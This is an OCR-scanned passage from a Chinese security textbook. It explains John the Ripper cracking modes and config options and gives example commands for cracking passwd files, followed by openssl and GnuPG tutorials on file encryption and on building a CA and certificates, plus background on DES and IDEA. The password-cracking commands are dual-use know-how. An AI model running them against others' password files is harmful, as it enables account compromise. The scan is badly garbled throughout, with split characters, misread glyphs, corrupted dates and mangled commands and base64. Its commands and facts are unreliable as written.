破解 模式 ,需要 指定 破解 模式 的 一 些 参 数 ,比如 密码 的 长 度 、 字 元 集 等 ,这 些 参数 在 


增强 模式 john. conf 文件 (Windows 中 是 john. ini 文件 ) 中 的 [Incremental: 一 mode 二 ] 段 内 ， 
所 mode> 可 以 任意 命名 ,这 是 在 执行 John 时 命令 行 中 指定 的 名 称 
在 使 用 John 时 可 以 定义 一 些 扩充 的 破解 模式 。 要 在 john. conf 文件 (Windows 中 是 
扩充 模式 john. ini 文件 ) 中 的 [List External: mode ]— 15 r 48 3E , < mode JÈ Br f& s ff] BER 


名 称 。 这 段 中 必须 包含 一 些 John 尝试 要 产生 的 字典 的 功能 。 这 些 功 能 包含 一 些 
使 用 C 语 言 编写 的 功能 函数 , 它 会 自动 在 John 执行 前 编译 


4. john. conf 文件 

可 以 通过 编辑 john. conf 文件 来 改变 John the Ripper 的 破解 行为 和 方式 。 

john. conf 文件 由 许多 段 组 成 ,每 一 个 段 的 开始 是 本 段 的 名 称 , 段 名 由 方 括号 括 起 来 ,每 
一 个 段 中 内 含 了 指定 的 一 些 选 项 ,在 行 前 有 ”* 井 ”或 “;”, 表 示 这 一 行 的 注释 。 

COD 一 般 选 项 。 预 设 的 一 些 命令 行 选项 放 在 LOptions] 段 中 ,该 段 中 选项 及 其 功能 说 明 
见 表 3-3. 

表 3-3 [Options] 段 中 选项 及 其 功能 说 明 

选项 功 能 
设 定 用 户 的 字典 档 档 名 ,这 会 自动 虚拟 成 用 户 正 使 用 的 破解 模式 是 字典 档 模式 ,不 需要 再 
加 上 “-wordlist” 选 项 
当 系 统 找到 密码 时 会 发 出 “ 哗 ” 声 ,或 是 在 一 些 要 问 用 户 (Yes/No) 时 也 会 令 用 户 的 计算 机 
Beep 发 出 声响 来 提醒 用 户 。 另 一 组 相反 的 选项 为 -quiet, 它 不 会 令 用 户 的 计算 机 发 出 声响 ,所 
以 最 好 先 指 定 Beep, 当 用 户 需 要 让 计算 机 安静 时 ,在 命令 行使 用 -quiet 即 可 


Wordlist 
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(2) 增强 破解 模式 的 参数 。 在 [Incremental: 二 mode 二 ] 段 中 定义 增强 模式 的 参数 ， 
二 mode 盖 是 自己 指定 的 段 的 名 称 。 有 一 些 已 经 预 设 的 增强 模式 的 选项 及 其 功能 说 明 
见 表 3-4。 


表 3-4 [Incremental] 段 中 选项 及 其 功能 说 阴 


xo 项 功 能 

CharCount 限制 不 同 字 元 使 用 时 的 字数 ,让 John 运行 之 初 就 可 以 早 一 点 尝试 长 串 的 密码 
MinLen 最 小 的 密码 字 串 长 度 

MaxLen 最 大 的 密码 字 串 长 度 

File 外 部 字 元 集 文件 名 , 设 定 该 参数 将 取消 在 配置 文件 中 指定 的 字 元 集 

5. 使 用 举例 


使 用 进行 密码 破解 的 例子 及 其 说 明 见 表 3-5。 
cs 密码 破解 的 例子 及 其 说 明 


john -single passwd. txt 
1 john -si passwd. txt 
使 用 Single Crack 模式 破解 密码 文件 passwd. txt, 第 二 条 命令 的 选项 使 用 了 简写 形式 


john -single passwdl.txt passwd2. txt passwd3. txt 


2 john -single passwd?. txt 
一 次 破解 多 个 密码 文件 


john -w:words. lst passwd. txt 


john -w:words. lst -rules passwd. txt 

john -w:words.lst -rules passwd?. txt 

指定 一 个 密码 词典 文件 ,并 且 使 用 规则 化 的 方式 

john -i passwd. txt 

使 用 增强 模式 ,尝试 将 所 有 可 能 的 字符 组 合作 为 密码 

john -i:Alpha passwd. txt 

使 用 增强 模式 ,尝试 将 除 大 写字 母 的 所 有 可 能 的 字符 组 合作 为 密码 


34 x ft in 


3.4.1 实例 : 用 对 称 加 密 算法 加 密 文件 

可 以 用 openssl 进行 文件 加 密 。 该 方法 没有 创建 密 钥 的 过 程 , 比 gpg 加 密 方法 简单 。 

将 密 文 发 给 接收 方 后 ,只 要 接收 方 知道 加 密 的 算法 和 口令 ,就 可 以 得 到 明文 。 

openssl 支持 的 加 密 算法 很 多 ,包括 bf, cast, des, des3, idea, rc2, rc5. 及 以 上 各 种 的 变 
体 , 具 体 可 参阅 相关 文档 。 

本 实例 对 文件 的 加 密 和 解密 在 同一 台 计 算 机 上 进行 ,如 图 3-81 所 示 o 

1. 发 送 方 加 密 一 个 文件 

发 送 方 执行 openssl enc -des -e -a -in temp_des. txt -out temp_des. txt. enc 命令 加 密 
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root&localhost:-/Desktop/openssl 


[rootelocalhost openss1]* openssl enc -des -e -a -in temp des.txt —out temp des.txt.enc 
enter des-cbc encryption password: 
Verifying — enter des-cbc encryption password: 发 送 方 执行 的 命令 
[rootelocalhost openss1]# cat temp des.txt.enc 

V2FsdGVkX1 sggb*KFHVHI ITz5RmLYQJAI hzyZ jEb2XI So/6D3KZo jw— 
[rootelocalhost openssi]# openssl enc -des -d -a -in temp des.txt.enc -out ttemp des.txt 
enter des-cbc decryption password: 
[rootelocalhost openssl]# cat ttemp des.txt 接收 方 执行 的 命令 
asdfdggddfqerttq 明文 


[rootelocalhost openss1]# cat temp des.txt B 
lasdfdggddfaertta | 密 文 | | 
il 


图 3-81 用 openssl 加 密 、 解 密 文件 


temp_des. txt 文件 ,生成 加 密 文件 temp_des. txt. enc。 

ene; 使 用 的 算法 。 

-des: 具体 使 用 的 算法 。 

-e: 表示 加 密 。 

-a: 使 用 ASCII 进行 编码 。 

-in: 要 加 密 的 文件 名 。 

-out: 加 密 后 的 文件 名 。 

2. 接收 方 解 密 密 文 

接收 方 执行 openssl enc -des -d -a -in temp des. txt. enc -out ttemp_des. txt 命令 对 密 
X temp des. txt. enc 进行 解密 ,生成 明文 文件 ttemp_des. txt。 

-d: 表示 解密 。 


3.4.2 对 称 加 密 算 法 


对 称 加 密 算法 又 称 传统 密码 算法 ,或 单 密 钥 算 法 ,采用 了 对 称 密码 编码 技术 ,其 特点 是 
文件 加 密 和 解密 使 用 相同 的 密 钥 。 使 用 对 称 加 密 算 法 简单 快捷 , 密 钥 较 短 ,并 且 破 译 难 度 很 
大 。 数 据 加 密 标 准 (Data Encryption Standard, DES) 是 对 称 加 密 算法 的 典型 代表 ,除了 
DES , 另 一 个 对 称 加 密 算 法 是 国际 数据 加 密 算 法 (IDEA) , 它 比 DES 的 加 密 性 更 好 ,并 且 对 
计算 机 功能 要 求 不 高 。IDEA 加 密 标 准 由 PGPCPretty Good Privacy) 系 统 使 用 。 

对 称 加 密 算法 的 安全 性 依赖 于 密 钥 的 安全 性 ,泄露 密 钥 就 意味 着 任何 人 都 能 对 密 文 进 
行 解密 。 因 此 必须 通过 安全 可 靠 的 途径 (如 信使 递送 ) 将 密 钥 送 至 接收 端 。 这 种 如 何 将 密 钥 
安全 可 靠 地 分 配给 通信 对 方 ,包括 密 钥 产生 、 分 配 、 存 储 、 销 毁 等 多 方面 的 问题 统称 为 密 钥 管 
理 (Key Management) ,这 是 影响 系统 安全 的 关键 因素 。 


对 称 加 密 算 法 分 为 两 类 。 

一 类 是 序列 算法 或 序列 密码 : 一 次 只 对 明文 中 的 单个 比特 (有 时 对 字 节 ) 进 行 运算 。 

另 一 类 是 分 组 算法 或 分 组 密码 : 对 明文 中 的 一 组 比特 进行 运算 ,这 些 比特 组 称 为 分 组 。 

现代 计算 机 密码 算法 的 典型 分 组 长 度 是 64bit, 该 长 度 大 到 足以 防止 破译 ,而 又 小 到 足 
以 方便 使 用 。 


综 上 所 述 ,对称 加 密 算 法 的 主要 优点 是 运算 速度 快 ,硬件 容易 实现 ; 缺点 是 密 钥 的 分 发 

与 管理 比较 困难 ,容易 被 窃取 ,另外 , 当 通 信 的 人 数 增加 时 , 密 钥 数 目 也 会 急剧 增加 。 例 如 ， 
在 拥有 众多 用 户 的 网 络 环境 中 使 个 用 户 之 间 相 互 进行 保密 通信 ,车 使 用 同一 个 对 称 密 钥 ， 
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一 旦 密 钥 被 破解 ,整个 系统 就 会 崩溃 ; 使 用 不 同 的 对 称 密 钥 , 则 密 钥 的 个 数 几 乎 与 通信 人 数 
成 正比 (需要 ”X(z 一 1) 个 密 钥 ) 。 由 此 可 见 , 若 采用 对 称 密 钥 ,大 系统 的 密 钥 管理 是 不 容易 
实现 的 。 

1. 数据 加 密 标准 DES 算法 

DES 算法 的 发 明 人 是 IBM 公司 的 W. Tuchman 和 C. Meyer, F 1971—1972 年 研制 成 
功 。 美国 商业 部 的 国家 标准 局 NBS 于 1973 4 5 HA 1974 4 8 月 两 次 发 布 通告 ,公开 征求 
用 于 电子 计算 机 的 加 密 算法 ,经 评选 ,从 一 大 批 算 法 中 采纳 了 IBM 的 LUCIFER 方案 ,该 算 
法 于 1976 年 11 月 被 美国 政府 采用 ,DES 随后 被 美国 国家 标准 局 和 美国 国家 标准 协会 
(American National Standard Institute, ANSI) 承认 。1977 年 1 月 以 数据 加 密 标 准 DES 
(Data Encryption Standard) 的 名 称 正 式 向 社会 公布 ,并 于 1977 年 7 月 15 日 生效 。 

2. 国际 数据 加 密 算法 IDEA 

近年 来 , 新 的 分 组 加 密 算法 不 断 出 现 , IDEA. 就 是 其 中 的 杰出 代表 。IDEA 是 
International Data Encryption Algorithm 的 缩写 , 即 国际 数据 加 密 算法 。 它 是 根据 中 国学 
者 朱 学 嘉 博士 与 著名 密码 学 家 James Massey 于 1990 年 联合 提出 的 建议 标准 算法 PES 
(Proposed Encryption Standard) 改 进而 来 的 。 它 的 明文 与 密 文 块 都 是 64bit, 密 钥 长 度 为 
128bit, 作 为 单 钥 体制 的 密码 ,其 加 密 与 解密 过 程 相 似 ,只 是 密 钥 存在 差异 ,IDEA 无 论 是 采 
用 软件 还 是 硬件 实现 都 比较 容易 ,而 且 加 、 解 密 的 速度 很 快 。 

IDEA 算法 是 面向 块 的 单 钥 密码 算法 , 它 的 安全 性 与 DES 类 似 ,不 在 于 算法 的 保密 ,而 
是 密 钥 的 安全 性 。 
3.4.3 实例 : 用 非 对 称 加 密 算法 加 密 文件 

1. 用 GnuPG 加 密 文件 

GnuPG 软件 包 (Gnu Privacy Guard,Gnu 隐私 保镖 ) ,软件 包 的 名 称 是 gpg。 

(1) 创建 密 钥 对 

创建 一 个 用 来 发 送 加 密 数 据 和 进行 解密 数据 的 密 钥 。 执 行 gpg 命令 ,会 在 主 目录 下 创 
建 一 个 . gnupg 子 目录 。 在 该 子 目 录 里 面 有 一 个 gpg. conf 的 配置 文件 , 它 里 面 是 gpg 工具 
的 各 种 选项 及 其 默认 设置 值 。 

执行 gpg --gen-key 命令 ,生成 密 钥 ,如 图 3-82 所 示 。 

在 图 3-82 中 确认 选择 无 误 后 ,在 最 后 一 行 输入 y TE Enter 键 。 

在 图 3-83 中 根据 提示 输入 相关 信息 。 

现在 已 经 在 . gnupg 目录 中 生成 了 一 对 密 钥 且 存 在 于 文件 中 ,进入 . gnupg 目录 进行 查 
看 ,如 图 3-84 所 示 。 

(2) 提取 公共 密 钥 

为 了 使 对 方 使 用 刚才 生成 的 公共 密 钥 ,需要 用 命令 将 公共 密 钥 提取 出 来 ,发 给 对 方 。 执 
行 命令 gpg --export 5294DEAC > pub. key, 将 公共 密 钥 提取 到 文件 pub. key P. 

G) 对 方 收 到 公共 密 钥 

收 到 别人 的 公共 密 钥 后 .执行 命令 gpg --import pub. key, 把 这 个 公共 密 钥 放 到 自己 的 
pubring. gpg 文件 (钥匙 环 文件 ) 里 。 命 令 的 执行 如 图 3-85 所 示 。 

执行 gpg -kv 命令 可 以 查看 目前 存放 的 别人 的 公共 密 钥 ,如 图 3-86 所 示 。 
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[rootelocalhost ^]f gpg —gen-key 

gpg (GnuPG) 1.4.5; Copyright (C) 2006 Free Software Foundation, Inc. 
This program comes with ABSOLUTELY NO WARRANTY. 

This is free software, and you are welcome to redistribute it 

under certain conditions. See the file COPYING for details. 


gpg: 铀 是 环 /root/.gnupg/secring.gpg' 已 建立 
gpg: 角 是 环 )root/.gnupg/pubring .gpg 已 建立 
请 选择 您 要 使 用 的 密 钥 种 类 : 

(1) DSA 和 ElGamal (默认 ) 

(2) psa ( 仅 用 于 签名 ) 

(5) RSA (RATEZ) 
您 的 选择 ? 1 
DSA 密 钥 对 会 有 1024 位 。 
ELG-E 密 钥 长 度 应 在 1024 位 与 4096 位 之 间 。 
您 想 要 用 多 大 的 密 钥 尺寸 ? (2048)1024 
您 所 要 求 的 密 钥 尺寸 是 1024 位 
请 设 定 这 把 密 铀 的 有 效 期 限 。 


0 = 密 钥 永 不 过 期 
«n» = 密 钥 在 n 天 后 过 期 
<n>w = AE n 周 后 过 期 
«m = 密 铀 在 n 月 后 过 期 
= 密 钥 在 n 年 后 过 期 
dn A TUR ROE ? (0) 
密 角 永远 不 会 过 期 


以 上 正确 吗 ? (y/n) 


图 3-82 创建 密 钥 (1) 


您 需要 一 个 用 户 标识 来 办 识 您 的 密 蚀 ; 本 软件 会 用 真实 姓名 、 注 释 和 电子 邮件 地 址 组 合 
成 用 户 标识 ， 如 下 所 示 : 
Weinrich Heine (Der Dichter) «heinrichheduesseldorf.de»" 


真实 姓名 : ztg 

姓名 至 少 要 有 五 个 字符 长 

真实 姓名 : ztguang 

电子 邮件 地 址 : jsjoscpu@163.com 
注释 : example 

您 选 定 了 这 个 用 户 标识 : 


Ztguang (example) «jsjoscpu6163.com»" 


更 改姓 名 (N)、 注 释 (C)、 电 子 邮 件 地 址 (E) 或 确定 (0)/ 退 出 (Q) 2 0 
您 需要 一 个 密码 来 保护 您 的 私 钢 。 


我 们 需要 生成 大 量 的 随机 字 节 。 这 个 时 候 您 可 以 多 做 些 琐事 ( 像 是 鼓 打 键 盘 、 移 动 

鼠标 、 读 写 硬盘 之 类 的 )， 这 会 让 随机 数字 发 生 器 有 更 好 的 机 会 获得 足够 的 丧 数 。 

L 十 十 十 十 十 。 十 十 十 十 十 十 十 十 二 十。 十 十 十 十 十 二 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 。 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 二 十 十 十 十 十 十 

生计 eA 

dU e ELA EU M ME. S BARETA S GcESCE CIE M IT > h 

Mi RREZE)’ d 4iMIECSCEXERAA P i ee BER EC 
————— "———— 

— 

gpg: /root/.gnupg/trustdb.gpg : 建立 了 信任 度数 据 库 

gpg: 密 钢 3FAF8118 被 标记 为 绝对 信任 

公 钢 和 私 铀 已 经 生成 并 经 答 名 。 


gpg: 正在 检查 信任 度数 据 库 
gpg: 需要 3 NARRE 1 份 完全 信任 ，PGP 信任 模型 


gpg: 深度 :0 有 效 性 : 1 已 签名 : 0 信任 度 : 0-，0q，0n，0m，Oof，1 
pub — 1024D/SFAFBSIT8]2010-06-03 生成 的 公共 Wi, 到 


密 铀 指纹 = 8198 D64E 67AF 3779 8E78 7DEO BB48 DD79 3FAF 8118 
uid ztguang (example) <jsjoscpu@163.com> 
sub — 1024g/9E4FF2FE 2010-06-03 


[rootelocaihost 7]& B 


图 3-83 创建 密 钥 (2) 
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[rootelocalhost ^]& 11 .gnupg/ 
总 计 56 


1 root root 9207 06-03 10:22 gpg.conf 

1 root root 912 06-03 10:25 pubring.gpg 
1 root root 912 06-03 10:25 pubring.gpg^ 
1 
1 


root root 600 06-03 10:25 random seed 
root root 1050 06-03 10:25 secring .gpg 


Lg 
一 rw- 


1 root root 1280 06-03 10:25 trustdb.gpg 


[rootelocalhost ^]& lj 


图 3-84 .gnupg 目录 内 容 


[rootelocalhost Desktop]# gpg 一 import pub.key 

gps: 密 钥 3FAF8118 : 公 钥 Ztguang (example) <jsjoscpuel163.com>" 已 导入 

gpg: 合计 被 处 理 的 数量 : 1 

EDE: 已 导入 :1 

[rootelocalhost Desktop]# gpg —delete-secret-and-public-key 3FAF8118 
gpg (GnuPG) 1.4.5; Copyright (C) 2006 Free Software Foundation, Inc. 

This program comes with ABSOLUTELY NO WARRANTY. 

This is free software, and you are welcome to redistribute it 

under certain conditions. See the file COPYING for details. 


pub 1024D/S3FAF8118 2010-06-03 ztguang (example) «jsjoscpuel63.com» 


要 从 钥匙 环 里 删除 这 把 密 钥 吗 了 (y/N)y 
[rootelocalhost Desktop]# 


图 3-85 ”保存 别人 的 公共 密 钥 


[rootelocalhost Desktop]# gpg -kv 
/root/ .gnupg/pubring.gpg 


pub —1024D/3FAF8118 2010-06-03 
uid ztguang (example) «jsjoscpue163.com: 
sub —1024g/9E4FF2FE 2010-06-03 


[rootelocalhost Desktop]& $ 


图 3-86 查看 公共 密 钥 


OD 对 方 用 公共 密 钥 加 密 文件 

对 方 执行 命令 gpg -ea -r 5294DEAC temp_dsa. txt. Xf temp_dsa. txt 文件 进行 加 密 。 

-e: 代表 加 密 。 

-a: 代表 ASCII 格式 。 

-r: 后 面 是 公共 密 钥 标识 。 

5294DEAC: 为 密 钥 标识 。 

该 命令 执行 后 ,在 当前 目录 下 生成 了 一 个 同名 的 temp_dsa. txt. asc 的 文件 , 即 加 密 后 
的 文件 。 具 体 执行 过 程 如 图 3-87 所 示 。 

(5) 我 方 对 加 密 文件 进行 解密 

我 方 收 到 temp_dsa. txt. asc 文件 后 ,执行 gpg -o ttemp_dsa. txt -d temp_dsa. txt. asc 
命令 ,用 私有 密 钥 对 加 密 文件 进行 解密 。 

-o: 输出 文件 。 

-d: 表示 解密 。 

在 当前 目录 下 生成 了 解密 后 的 文件 ttemp_dsa. txt。 具 体 执行 过 程 如 图 3-88 所 示 。 
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[rooteiocalhost Desktop]# cat gpg temp.txt 

pgp jia jie mi shi yan!!! 

[rootelocalhost Desktop]& -ea -r 3FAF8118 temp.txt 
gpg: 9EAFF2FE : AA iE 4E A 9] e f 


pub 1024g/9E4FF2FE 2010-06-03 ztguang (example) «jsjoscpuel63.com» 
主 钥 指纹 : 8198 D64E 67AF 3779 8E78  7DEO BB48 DD79 3FAF 8118 
子 钥 指纹 : A093 D5B7 SIBA A276 CBEA DB37 14A7 7452 9E4F F2FE 


这 把 密 钥 并 不 一 定 属于 用 户 标识 声称 的 那个 人 。 如 果 您 真 的 知道 自 
己 在 做 什么 ， 您 可 以 在 下 一 个 问题 回答 yes- 


无 论 如 何 还 是 使 用 这 把 密 钥 吗 ? (y/N)y. ek 


[rootelocalhost Desktop]# cat temp.txt.asc 


ersion: GnuPG vl.4.5 (GNU/Linux) 


IQEOAxSndFKeT/L*EAP/XWI XF2tQTZNOdUMI RTX£Zn9SWjpr sGpBl KXe129Vi5aA 
HZFu2OHBTek/f YDmeMeMVWa 1 bgBsaS4E*XYOSLdNz T/FNXBRDMRÉ wOUQe BWYBNc 
(Od suSjKACTTI 3HPDWMi YrXJFwpWVHoeOJAhz MKGg9F i GDI 4«phaYt2Jm4Gf SX8D 
22JaPkPjI4dTS8axW4UuDyOf /WO9FxYo49bj1 Q5dGckOzNi Fc 1 nuGv4x/21/rN1 
NTuQavQl xJeYtdAguU*T/RBXtk9EhxBOSqAtRI /DJuMv Lj5XOAbrvFJ.j LU2BzO 
BlRrotzOISnxtuFYaP7abv61vjKsCI3JQ*S77Hyb/igO18BjzhWCl tdy7UK-ACq 
Xv26YR39g wxQ19C-4QCBdfSUt 1 ygbNMVJme pPO/U1SVe2pWK.jboDeohZ /u49W9mM 
Aysy7UoDb*Qt2tMq*pCBe0GyGpn71 19cX90ZCAGbQaLg-— 
H1nQ 


END PGP MESSAGE 
[rootelocalhost Desktop]# M 


图 3-87 用 公共 密 钥 加 密 文件 


[rootelocalhost Desktop]# gpg -o gpg.temp2.txt -d gpg temp.txt.asc 


您 需要 输入 密码 ， 才 能 解 开 这 个 用 户 的 私 钥 : Ztguang (example) «jsjoscpuel63.com-" 
1024 位 的 ELG-E 密 钥 ， 钥 是 号 9E4FF2FE， 建 立 于 2010-06-03 ( 主 钥 是 号 3FAF8118) 


gpg: 由 1024 位 的 ELG-E 密 钥 加 密 ， 铀 是 号 为 9E4FF2FE、 生 成 于 2010-06-03 
Ztguang (example) «jsjoscpuel63.com»" 
[rootelocalhost Desktop]f cat gpg temp2.txt 


pgp jia jie mi shi yan!!! [MERC RIS XC] 


rootelocalhost Desktop]* M 


图 3-88 对 加 密 文件 进行 解密 


2. 用 OpenSSL 加 密 文 件 

OpenSSL 可 以 实现 消息 摘要 文件 的 加 密 和 解密 ` 数 字 证 书 、 数 字 签 名 和 随机 数字 。 
(网 址 为 http://www. openssl. org/) 

SSL 是 Secure Sockets Layer 的 缩写 ,是 支持 在 Internet 上 进行 安全 通信 的 标准 ,并 且 
将 数据 密码 技术 集成 到 协议 中 。 数 据 在 离开 计算 机 之 前 被 加 密 , 然 后 只 有 到 达 它 预定 的 目 
标 后 才 被 解密 。 

(1) 安装 openssl-0. 9. 8n 

[root(2localhost Desktop] # tar - xzvf openssl- 0.9.8n.tar.gz 

[root(2localhost Desktop]it cd openssl- 0. 9. 8n 

[root@ localhost openssl- 0.9.8n]£ ./config —- prefix = /root/openssl 


[root(2localhost openssl- 0.9.8n]it make 
[root(2localhost openssl- 0.9.8n]£ make install 


(2) 产生 CA 证 书 
修改 一 /openssl/ssl/openssl. cnf 文件 中 的 一 行 ( 约 42 行 ) 为 dir — /root/openssl/ssl/ 
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misc/demoCA ,将 产生 的 CA 证 书 放置 在 /root/openssl/ssl/misc/demoCA F. 


[root(2localhost openssl- 0.9.8n]# cd /root/openssl/ssl/misc/ 
[root(2localhost misc]# cp ../openssl.cnf /etc/pki/tls/openssl.cnf 
[root@ localhost misc]# dir 

CA. pl CA. sh c hash c info c issuer c name 


执行 CA 证 书 产生 脚本 CA. sh, 如 下 所 示 。 


[root(2localhost misc]it ./CA.sh - newca 
CA certificate filename (or enter to create) 


Making CA certificate ... 
Generating a 1024 bit RSA private key 


十 + 二 十 十 十 十 十 十 十 十 二 


writing new private key to '. /demoCA/private/. /cakey. pem" 

Enter PEM pass phrase: 

Verifying - Enter PEM pass phrase: 

You are about to be asked to enter information that will be incorporated 
into your certificate request. 

What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 

Country Name (2 letter code) [AU]:CN 

State or Province Name (full name) [Some - State] :HN 

Locality Name (eg, city) []:XX 

Organization Name (eg, company) [Internet Widgits Pty Ltd]:XXU 
Organizational Unit Name (eg, section) []:JSJ 

Common Name (eg, YOUR name) [ ]:ZTG 

Email Address [ ] : jsjoscpu@163. com 


Please enter the following 'extra' attributes 
to be sent with your certificate request 
A challenge password [ ]:123456 
An optional company name [ ]: COMPUTER 
Using configuration from /etc/pki/tls/openssl.cnf 
Enter pass phrase for . /demoCA/private/. /cakey. pem: 
Check that the request matches the signature 
Signature ok 
Certificate Details: 
Serial Number: 
f£2:01:3d:54:£6:16:bd:a9 
Validity 
Not Before: Jun 3 04:15:28 2010 GMT 
Not After : Jun 2 04:15:28 2013 GMT 


Subject: 
countryName - CN 
stateOrProvinceName - HN 
organizationName = XXU 
organizationalUnitName - JSJ 
commonName - ZIG 
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emailAddress = jsjoscpu(2163.com 
X509v3 extensions: 
X509v3 Subject Key Identifier: 
B8:AC:08:62:87:4C:B0:B3:D8:D3:B9:84:6D:04:AA:66:3B:6F:11:F2 
X509v3 Authority Key Identifier: 
keyid:B8:AC:08:62:87:4C:B0:B3:D8:D3:B9:84:6D:04:AA:66:3B:6F:11:F2 
DirName:/C = CN/ST = HN/O = XXU/OU = JSJ/CN = ZTG/emailAddress = jsjoscpu@ 


163. com 
serial:F2:01:3D:54:F6:16:BD:A9 
X509v3 Basic Constraints: 
CA: TRUE 
Certificate is to be certified until Jun 2 04:15:28 2013 GMT (1095 days) 


Write out database with 1 new entries 

Data Base Updated 

[root(2 localhost misc] # 

[root (2 localhost misc] # dir demoCA/cacert. pem careq. pem certs crl index. txt 
index. txt. attr index. txt. old newcerts private serial cacert. pem 就 是 CA 证 书 ,CA A9] f£ 
放 在 private 目录 。 

(3) 以 CA 产生 次 级 证 书 

在 CA 证 书 产生 之 后 ,就 可 以 产生 使 用 者 或 公司 所 需要 的 次 级 证 书 ,次 级 证 书 可 应 用 于 
数字 签名 或 https 等 ssl 传输 加 密 。 

CD 产生 使 用 者 的 密 钥 文件 及 CSR 文件 (Certificate Signing Request) 。 执 行 如 下 命令 : 


[root@ localhost misc] # 一 /openssl/bin/openssl req - nodes - new - keyout private key. pem 
— out private req.pem - days 3650 - config — /openssl/ssl/openssl.cnf 


如 图 3-89 所 示 ,根据 提示 输入 相关 信息 。 


[rootelocalhost misc]# 7/openssl/bin/openssl req -nodes -new -keyout private_key.pem[ 
-out private req.pem -days 3650 -config "/openssl/ssl/openssl.cnf 1 
Generating a 1024 bit RSA private key 

Htt 

writing new private key to 'private key.pem" 


You are about to be asked to enter information that will be incorporated 
into your certificate request. 

What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 


Country Name (2 letter code) [AU]:CN 

State or Province Name (full name) [Some-State]:HN. 

Locality Name (eg, city) []:XX 

Organization Name (eg, company) [Internet Widgits Pty Ltd]:XXU 
Organizational Unit Name (eg, section) []:JSJ 

Common Name (eg, YOUR name) []:ZTG m 

Email Address []:jsjoscpuel63.com 


Please enter the following 'extra' attributes 
to be sent with your certificate request 

A challenge password []:123456 

An optional company name []:COMPUTER 
[rootelocalhost misc]lt M 一 


图 3-89 产生 使 用 者 密 钥 文件 及 CSR 文件 
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Q 产生 使 用 者 之 证 书 。 执 行 如 下 命令 : 


[root@ localhost misc] # ~/openssl/bin/openssl ca - config ~/openssl/ssl/openssl. cnf 一 
policy policy anything ~ out public key.pem - infiles private req.pem 


如 图 3-90 所 示 ,根据 提示 输入 相关 信息 。 


[rootelocalhost misc]#“/openssl/bin/openssl ca -config ^/openssl/ssl/openssl.cnf -p 


olicy policy anything -out public key.pem -infiles private req.pem 
Using configuration from /root/openssl/ssl/openssl.cnf 
Enter pass phrase for ./demoCA/private/cakey.pem: 
Check that the request matches the signature 
Signature ok 
Certificate Details: 

Serial Number: 

£2:01:3d:54:f£6:16:bd:aa 


Validity 
Not Before: 
Not After : Jun 3 04 

Subject: 
countryName CN 
stateOrProvinceName HN 
localityName Xx 
organizationName XXU 
organizationalUnitName JSJ 
commonName ZTG 
emailAddress = jsjoscpuel63.com 


X509v3 extensions: 
X509v3 Basic Constraints: 
CA:FALSE 
Netscape Comment: 
OpenSSL Generated Certificate 
X509v3 Subject Key Identifier: 
23:30:8E: A3:77:2D:D2:58:94:84:E5:38:00:D1 :E7:C8:96:91:78:E3 
X509v3 Authority Key Identifier: 
keyid:B8:AC:08:62:87:4C:B0: B3:D8: D3: B9:84:6D:04:AA:66:3B:6F:11:F2 


Certificate is to be certified until Jun 3 04:23:38 2011 GMT (365 days) 
Sign the certificate? [y/n]:y 


1 out of 1 certificate requests certified, commit? [y/nly 
Write out database with 1 new entries = 
Data Base Updated 

[rootelocalhost miscl# B 


图 3-90 产生 使 用 者 之 证 书 


© 文件 加 密 。public_key. pem 为 公开 密 钥 ,如 果 某 人 要 加 密 并 传送 一 个 文件 , 则 可 以 
用 公 钥 public key. pem 加 密 文 件 。 假 如 某 人 要 传送 的 文件 是 openssl_test. txt, 加 密 后 文 
件 名 为 openssl_test. enc, 执 行 如 下 命令 即 可 : 


[root@localhost misc] # -—-/openssl/bin/openssl smime - encrypt - in openssl test.txt — out 
openssl test.enc public key.pem 


文件 openssl. test. txt 的 内 容 为 "openssl_test shi yan! ! !". 


@ 文件 解密 。 收 到 对 方 发 过 来 的 加 密 文 件 openssl. test. enc 后 ,执行 如 下 命令 可 直接 
查看 文件 的 内 容 , 如 图 3-91 所 示 。 


[root(2localhost misc]# less openssl test. enc 
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[rootelocalhost misc]# cat openssl test.enc 

MIME-Version: 1.0 

Content-Disposition: attachment; filename-"smime.p7m" 

Content-Type: application/pkcs7-mime; smime-type-enveloped-data; name-"smime.p7m" 
Content-Transfer-Encoding: base64 


MIIBcgYJKoZIhvcNAQcDoI IBYzCCAVSCAQAxggENMI I BCQI BADByMGUxCz AJBgNV 
BAYTAKNOMQswCQYDVQQIEwJIT,jEMMAoGA1 UEChMDWFh VMQwwCg YDVQQLEwNKUOox 
DDAKBgNVBAMTAI pURZEfMBOGCSqGSIb3DQEJARYQanNqb3N,jc HVAMTYz LmNv bQT.J 
APIBPVT2Fr2qMA0GCSqGSI b3DQEBAQUABI GAFQXv byO YFutB99cQvZVP381F9TCN 
dNdcHnszyPoGshXFwr AKt8dZDLZ/£ yLM6i D7nmP14xCGi 9RWSFn8xADgOt RQDBd-- 
bNYEHRUxed£fPi3XzvkKhZjrRFiTuaqyOB8y5BUjTnHRXfc7-*bnAf TS5mx1 NVqB20AZ 
VUY/ckg*GNc PXhowSQYJKoZIhvcNAQc BHBoGCCqGSIb3DQMCMA4CAgCgBA,j JZVz x 
wha8w4Agsp211IvuRBtmV5Vy6taUJJK-*I bHTzSj2TjAG*561-sWO- 


[rootelocalhost misc]# $ 

图 3-91 $X openssl test. enc 
如 图 3-91 所 示 为 密 文 ,不 知 其 意 。 因 此 需要 解密 ,执行 如 下 命令 ,用 私 钥 private. key. 
pem 对 openssl test. enc 文件 解密 : 


[root@ localhost misc] € ~/openssl/bin/openssl smime — decrypt - in openssl test. enc - 
recip public key.pem - inkey private key.pem 


解密 出 来 的 明文 如 图 3-92 所 示 。 


[rootelocalhost misc]# ~/openss1/bin/openss1 smime -decrypt -in openssl_test.enc 


-recip public key.pem -inkey private_key.pem 
tre 


[rootelocalhost misc ]# [ | 


图 3-92 被 解密 的 明文 


3.4.4 非 对 称 加 密 算法 


若 加 密 密 钥 和 解密 密 钥 不 相同 ,从 其 中 一 个 难以 推出 另 一 个 , 则 称 为 非 对 称 密 钥 或 双 铀 
密码 体制 ,这 是 1976 年 美国 学 者 Diffie 和 Hellman 为 解决 信息 公开 传送 和 密 钥 管 理 问题 ， 
